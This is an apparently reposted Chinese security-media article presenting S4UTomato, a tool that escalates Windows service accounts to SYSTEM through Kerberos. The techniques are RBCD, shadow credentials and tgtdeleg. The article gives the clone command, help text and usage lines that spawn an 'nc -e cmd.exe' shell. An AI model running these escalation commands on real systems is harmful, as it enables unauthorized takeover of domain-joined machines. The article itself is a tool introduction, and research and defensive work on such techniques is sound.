如何使用S4UTomato通过Kerberos将服务账号提权为LocalSystem
2023-12-12 18:51:37 Author: FreeBuf(查看原文) 阅读量:7 收藏

 关于S4UTomato 

S4UTomato是一款功能强大的权限提升工具,该工具专为蓝队研究人员设计,可以通过Kerberos将服务账号(Service Account)权限提升为LocalSystem。

 工具运行机制 

熟悉“Potato”系列权限提升工具的研究人员肯定知道,这类工具可以将服务账号提升为本地系统权限,“Potato”所使用的技术和S4UTomato类似,即利用COM接口的特定功能,欺骗NT AUTHORITY\SYSTEM账号跟攻击者控制的RPC服务器进行连接,并完成身份认证。接下来,通过一系列API调用,并在身份认证过程中执行中间人攻击(NTLM中继),以生成针对目标本地系统中NT AUTHORITY\SYSTEM账号的访问令牌。最后,攻击者将能够获取到这个令牌,然后使用CreateProcessWithToken()或CreateProcessAsUser()函数传递令牌,并创建一个新的进程来获取SYSTEM权限。

 Kerbero的角色 

在Windows域环境中,SYSTEM、NT AUTHORITY\NETWORK SERVICE和Microsoft虚拟帐户可以用于对加入域的系统计算机帐户进行身份验证,而在现代版本的Windows中,大多数Windows服务默认使用Microsoft虚拟帐户运行。值得注意的是,IIS和MSSQL也在使用这些虚拟帐户。因此,我们可以使用S4UTomato来获取本地机器上域管理员帐户“administrator”的服务凭证,然后在SCMUACBypass工具的帮助下,利用该凭证创建系统服务并获得SYSTEM权限。

在计算机加入域的任意情况下,只要我们能够在Windows服务帐户或Microsoft虚拟帐户的上下文下运行代码,就可以利用上述技术进行本地权限提升。

在执行操作之前,我们需要为本地设备账户获取TGT,但由于服务账户权限的限制,导致我们无法获取到长期密钥,因此无法构造KRB_AS_REQ请求。为了实现上述目标,S4UTomato利用了三种技术:基于资源的约束委派影子凭据Tgtdeleg

 工具下载 

由于该工具基于C#开发,因此我们首先需要在本地设备上安装并配置好最新版本的Visual Studio。

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/wh0amitz/S4UTomato.git

然后在Visual Studio中导入项目,并完成代码构建和编译即可。

 工具使用帮助 

C:\Users\whoami\Desktop>S4UTomato.exe --help


S4UTomato 1.0.0-beta
Copyright (c) 2023


-d, --Domain 需要认证的目标域名(FQDN)
-s, --Server 域控制器或LDAP服务器的主机名称
-m, --ComputerName 需要创建的新计算机账号
-p, --ComputerPassword 新创建计算机账号的密码
-f, --Force 强制更新计算机对象的'msDS-KeyCredentialLink'属性
-c, --Command 需要运行的程序
-v, --Verbose 输出Verbose调试信息
--help 显示工具帮助信息
--version 显示工具版本信息

(向右滑动,查看更多)

 工具使用演示 

通过基于资源的约束委派实现本地特权提升

S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"

(向右滑动,查看更多)

通过影子凭证实现本地特权提升

S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f

(向右滑动,查看更多)

通过Tgtdeleg实现本地特权提升

# 首先通过Tgtdeleg获取TGT
S4UTomato.exe tgtdeleg
# 然后运行SCMUACBypass 获取SYSTEM权限
S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"

 项目地址 

S4UTomato

https://github.com/wh0amitz/S4UTomato

FreeBuf粉丝交流群招新啦!
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复“加群”,申请加入群聊
https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82

https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab

https://twitter.com/gentilkiwi/status/998219775485661184

https://github.com/GhostPack/Rubeus#tgtdeleg


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651250709&idx=4&sn=3c723de749896c566032ccb00e157ede&chksm=bc69e6c0e3f3df6b902f4c73cea3b0bb15bf9e9a6d03021b3f7ae289e82aafe79d9ca126f085&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh